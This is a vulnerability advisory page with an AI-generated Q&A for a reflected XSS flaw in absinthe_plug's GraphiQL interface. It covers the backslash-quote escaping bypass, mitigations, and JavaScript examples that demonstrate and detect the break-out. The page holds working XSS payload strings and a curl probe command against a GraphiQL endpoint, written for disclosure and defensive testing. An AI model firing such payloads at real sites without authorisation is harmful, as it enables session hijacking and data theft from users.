CVE-2026-42794
Status: Received - Intake
Reflected XSS in Absinthe Plug GraphiQL Interface

Publication date: 2026-05-08

Last updated on: 2026-05-08

Assigner: EEF

Description
Improper Neutralization of Input During Web Page Generation (XSS) vulnerability in absinthe-graphql absinthe_plug allows reflected cross-site scripting via the GraphiQL interface. 'Elixir.Absinthe.Plug.GraphiQL':js_escape/1 in lib/absinthe/plug/graphiql.ex escapes single quotes and newlines in the query GET parameter before embedding it in an inline JavaScript string, but does not escape backslashes. An attacker can bypass the escaping by prefixing a quote with a backslash (e.g. \'), breaking out of the string context and executing arbitrary JavaScript in the victim's browser. The bypass works because the escaper emits \' for the quote but passes the attacker's backslash through unchanged, so the literal receives \\' : the JavaScript parser reads \\ as one escaped backslash and the quote that follows terminates the string. This issue affects absinthe_plug: from 1.2.0.
Meta Information
Published: 2026-05-08
Last Modified: 2026-05-08
Generated: 2026-05-09
AI Q&A: 2026-05-08
CVSS Scores: none listed
EPSS: not yet evaluated (N/A)
References: NVD, EUVD
Affected Vendors & Products
Vendor: absinthe-graphql
Product: absinthe_plug
Version range: from 1.2.0 (inclusive) to 1.10.2 (exclusive)
CWE
CWE-79: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability is a reflected cross-site scripting (XSS) issue in the absinthe-graphql absinthe_plug library, specifically in the GraphiQL interface served by Absinthe.Plug.GraphiQL. The value of the query GET parameter is written into a single-quoted string inside an inline script block, and the js_escape/1 function that prepares it escapes single quotes (as \') and newlines (as \n) but leaves backslashes untouched. Because the escaper emits \' for every quote it sees, an attacker who supplies \' (a backslash followed by a quote) gets \\' in the output: the JavaScript parser reads \\ as an escaped backslash, so the following quote terminates the string literal and whatever comes next in the parameter is parsed and executed as JavaScript in the victim's browser. A payload therefore takes the shape \';<attacker code>;// where the trailing // comments out the template's own closing quote on that line.
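To make the break-out concrete, here is an added example that is not absinthe_plug's Elixir code and not from this page: the escaping behaviour the description attributes to js_escape/1 is re-expressed as a JavaScript function, dropped into a single-quoted literal the way a template would, and the rendered script is then parsed and executed with a fake alert and document so you can see which variants let attacker code run. The variable name defaultQuery and the template shape are assumptions, and the hardened escaper is one reasonable fix rather than the project's actual patch.

```javascript
// Added example (not absinthe_plug's own Elixir code): the escaping logic
// described in the advisory, re-expressed in JavaScript so the resulting
// inline script can be parsed and executed here to show the break-out.

// Vulnerable escaper: handles ' and newline, leaves backslashes alone.
function jsEscapeVulnerable(s) {
  return s.replace(/'/g, "\\'").replace(/\n/g, "\\n");
}

// A tempting but still-broken fix: escaping backslashes AFTER quotes turns
// the \' just emitted into \\' and reopens the hole for a plain quote.
function jsEscapeWrongOrder(s) {
  return s.replace(/'/g, "\\'").replace(/\n/g, "\\n").replace(/\\/g, "\\\\");
}

// Hardened escaper: backslash first, then quotes, line terminators (including
// U+2028/2029, which older engines treat as newlines inside string literals),
// and "</" so a reflected "</script>" cannot close the surrounding tag.
function jsEscapeFixed(s) {
  return s
    .replace(/\\/g, "\\\\")
    .replace(/'/g, "\\'")
    .replace(/\r/g, "\\r")
    .replace(/\n/g, "\\n")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029")
    .replace(/<\//g, "<\\/");
}

// Template stand-in (assumed shape): the escaped value lands inside a
// single-quoted literal, as the advisory describes for the query parameter.
function renderInlineScript(escaper, query) {
  return "var defaultQuery = '" + escaper(query) + "';";
}

// Parse and run the rendered script with a fake `alert` and `document`, and
// report which alerts fired and what the literal evaluated to.
function runInlineScript(script) {
  const seen = [];
  const fakeAlert = (msg) => seen.push(String(msg));
  const fakeDocument = { domain: "victim.example" };
  let value;
  try {
    const fn = new Function("alert", "document", script + "\nreturn defaultQuery;");
    value = fn(fakeAlert, fakeDocument);
  } catch (e) {
    return { alerts: seen, value: undefined, error: e.name };
  }
  return { alerts: seen, value, error: null };
}

// Constructed inputs: the advisory's break-out (backslash before the quote),
// a plain-quote attempt, and a benign query that legitimately contains a quote.
const BREAKOUT = "\\';alert(document.domain);//";
const PLAIN_QUOTE = "';alert(document.domain);//";
const BENIGN = "{ user(name: 'alice') { id } }\n";

function demo() {
  return {
    vulnerable: runInlineScript(renderInlineScript(jsEscapeVulnerable, BREAKOUT)),
    vulnerablePlainQuote: runInlineScript(renderInlineScript(jsEscapeVulnerable, PLAIN_QUOTE)),
    wrongOrder: runInlineScript(renderInlineScript(jsEscapeWrongOrder, PLAIN_QUOTE)),
    fixed: runInlineScript(renderInlineScript(jsEscapeFixed, BREAKOUT)),
    fixedBenign: runInlineScript(renderInlineScript(jsEscapeFixed, BENIGN)),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Running it shows the vulnerable escaper holding up against a plain quote but firing the fake alert for the backslash-quote input, the wrong-order variant firing for a plain quote, and the hardened escaper round-tripping both the payload and a benign query as inert string values. Escaping backslashes after quotes is a common regression when patching this class of bug; an alternative to hand-rolled escaping is to serialise the value as a JSON string (on the Elixir side Jason offers an escape option for HTML-safe output) and still escape the "</" sequence.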


How can this vulnerability impact me?

This vulnerability can allow an attacker to execute arbitrary JavaScript in the context of a victim's browser when the victim opens a crafted link to the vulnerable GraphiQL interface (it is reflected XSS, so the payload travels in the URL). Because the injected code runs in the origin of the application hosting GraphiQL, it can read cookies or tokens that are accessible to scripts on that origin, issue GraphQL requests with the victim's session, manipulate the page content, or perform other actions on behalf of the victim, potentially compromising user accounts or data.


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include updating absinthe_plug to a version that includes the fix, which escapes backslashes in js_escape/1 before the quote and newline handling; per the affected range listed above (from 1.2.0 inclusive to 1.10.2 exclusive), that means 1.10.2 or later.

If updating is not immediately possible, restrict or disable access to the GraphiQL interface in production environments, as it is a developer tool and only needs to be reachable by developers: mount Absinthe.Plug.GraphiQL only in development builds, or place it behind an authentication plug. Note that the endpoint still serves the GraphQL API for JSON requests; it is the HTML GraphiQL page that reflects the query parameter.

A Content Security Policy (CSP) reduces what a successful payload can do (for example by restricting connect-src, img-src and the loading of external scripts), but it does not by itself block this particular injection: the attacker's code executes inside the page's own inline script block, so a nonce or 'unsafe-inline' allowance that permits that block also permits the injected code. Treat CSP as defence in depth, not as a substitute for the patch.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The CVE-2026-42794 vulnerability is a reflected cross-site scripting (XSS) issue that allows execution of arbitrary JavaScript in a victim's browser via the GraphiQL interface of absinthe_plug. Such XSS vulnerabilities can lead to unauthorized access to user data or session hijacking.

While the provided information does not explicitly mention compliance with standards like GDPR or HIPAA, XSS vulnerabilities generally pose risks to data confidentiality and integrity, which are critical aspects of these regulations. Exploitation could potentially lead to unauthorized disclosure of personal or sensitive information, thereby impacting compliance.

Mitigation involves updating to a patched version and restricting or disabling the GraphiQL interface in production environments to reduce exposure.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by testing the GraphiQL interface served by absinthe_plug for reflected cross-site scripting (XSS) via the query GET parameter.

Send a query value that starts with a backslash followed by a single quote (\'), so that the escaper's output becomes \\' and terminates the inline JavaScript string; follow it with a harmless expression and // so the remainder of the template's line, including its own closing quote, is commented out.

Two details matter when probing with curl: Absinthe.Plug.GraphiQL renders the HTML interface only for GET requests whose Accept header contains text/html (curl sends */* by default, which falls through to the JSON GraphQL endpoint and never reflects the query into a script), and the backslash and quote should be percent-encoded so that neither the shell nor the URL parser interferes with them. For example:

  • curl -sS -H 'Accept: text/html' 'http://yourserver/graphiql?query=%5C%27%3Balert(document.domain)%3B%2F%2F'

Inspect the inline script in the response body. A vulnerable version reflects the parameter as \\';alert(document.domain);// (the attacker's backslash passed through, the quote escaped), which is exactly the sequence that ends the string literal; a version that escapes backslashes should reflect it as \\\';alert(document.domain);// and keep the whole payload inside the literal. Opening the same URL in a browser against a vulnerable version shows the alert.

Additionally, monitoring HTTP access logs for GraphiQL requests whose query parameter contains a backslash-escaped quote (%5C%27, or \' once decoded) may help detect exploitation attempts; because this is a GET parameter, the full payload is normally present in the request line of the access log.
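As an added example that is not part of the original page or the absinthe_plug project, the following Node script automates the check described above: it builds the percent-encoded probe around a sentinel, strips JavaScript string literals and comments from every inline script in the returned HTML with a small tokenizer, and reports a finding only if the sentinel survives in code position. It runs offline against constructed sample pages (the one-line escapers used to build them are stand-ins, not the project's code); the host name, the /graphiql path and the defaultQuery template shape are assumptions, and the optional live check uses the global fetch available in Node 18 and later.

```javascript
// Added example, not code from absinthe_plug or the page: an offline checker
// for the reflected-query break-out. Host and path are assumptions.

const SENTINEL = "q7r2s9"; // constructed marker; choose a fresh one per run
// Probe: backslash-quote break-out, a harmless expression carrying the
// sentinel, then // to swallow the template's own closing quote.
const PROBE = "\\';" + SENTINEL + ";//";

// Percent-encode the probe; the quote is encoded too so the URL is shell-safe.
function probeUrl(base) {
  return base + "/graphiql?query=" + encodeURIComponent(PROBE).replace(/'/g, "%27");
}

// Blank out everything inside JS string/template literals and comments so a
// search over the result only matches characters in code position. Regex
// literals are not modelled, so pages with regexes containing quotes or
// slashes can be mis-scanned: treat a finding as a lead to confirm by hand.
function codeOnly(js) {
  let out = "";
  let state = "code";
  for (let i = 0; i < js.length; i++) {
    const c = js[i], n = js[i + 1];
    if (state === "code") {
      if (c === "/" && n === "/") { state = "line"; out += "  "; i++; }
      else if (c === "/" && n === "*") { state = "block"; out += "  "; i++; }
      else if (c === "'" || c === '"' || c === "`") { state = c; out += " "; }
      else out += c;
    } else if (state === "line") {
      if (c === "\n") { state = "code"; out += c; } else out += " ";
    } else if (state === "block") {
      if (c === "*" && n === "/") { state = "code"; out += "  "; i++; } else out += " ";
    } else {                                  // inside a literal opened by `state`
      if (c === "\\") { out += "  "; i++; }   // escaped character: skip it
      else if (c === state) { state = "code"; out += " "; }
      else if (state !== "`" && c === "\n") { state = "code"; out += c; } // unterminated
      else out += " ";
    }
  }
  return out;
}

function extractScripts(html) {
  const scripts = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) scripts.push(m[1]);
  return scripts;
}

// True when the sentinel lands in code position in any inline script.
function isBreakout(html, sentinel = SENTINEL) {
  return extractScripts(html).some((js) => codeOnly(js).includes(sentinel));
}

// Constructed sample responses (not captured from a real server), built with
// one-line stand-ins for the flawed escaper and a backslash-aware one.
const vulnEscape = (s) => s.replace(/'/g, "\\'").replace(/\n/g, "\\n");
const fixedEscape = (s) => s.replace(/\\/g, "\\\\").replace(/'/g, "\\'").replace(/\n/g, "\\n");
function fakePage(reflected) {
  return '<html><body><div id="graphiql"></div>\n<script>\n' +
    "  var defaultQuery = '" + reflected + "';\n" +
    "  GraphiQL.render({ query: defaultQuery });\n" +
    "</script></body></html>";
}

// Live check against a real host; sends the Accept header that makes
// Absinthe.Plug.GraphiQL return the HTML page rather than JSON.
async function fetchAndCheck(base) {
  const res = await fetch(probeUrl(base), { headers: { Accept: "text/html" } });
  return { status: res.status, breakout: isBreakout(await res.text()) };
}

console.log("vulnerable sample:", isBreakout(fakePage(vulnEscape(PROBE))));  // true
console.log("patched sample:   ", isBreakout(fakePage(fixedEscape(PROBE)))); // false
if (typeof process !== "undefined" && process.argv.length > 2) {
  fetchAndCheck(process.argv[2]).then((r) => console.log(r), (e) => console.error(e.message));
}
```

Run it with no arguments to see the two constructed samples classified, or pass a base URL such as http://yourserver (an assumed host) to probe a live deployment. The tokenizer, rather than a plain substring search, is what keeps a sentinel that merely appears inside a legitimate string or comment from being reported as a finding.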

